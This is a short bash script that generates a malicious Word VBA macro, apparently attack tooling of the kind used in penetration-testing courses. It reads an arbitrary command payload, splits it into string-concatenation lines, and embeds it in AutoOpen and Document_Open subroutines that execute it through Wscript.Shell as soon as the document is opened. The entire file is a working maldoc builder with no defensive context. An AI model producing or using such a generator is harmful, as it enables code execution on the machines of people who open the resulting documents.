#!/bin/bash

set -e
shopt -s lastpipe

read -r PAYLOAD;

function generate_vba_payload() {
  echo "$PAYLOAD" | fold -w 70 | sed 's/.*/    Str = Str + \"&\"/'
}

cat <<EOF
Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    Str = ""

$(generate_vba_payload)

    CreateObject("Wscript.Shell").Run Str
End Sub
EOF
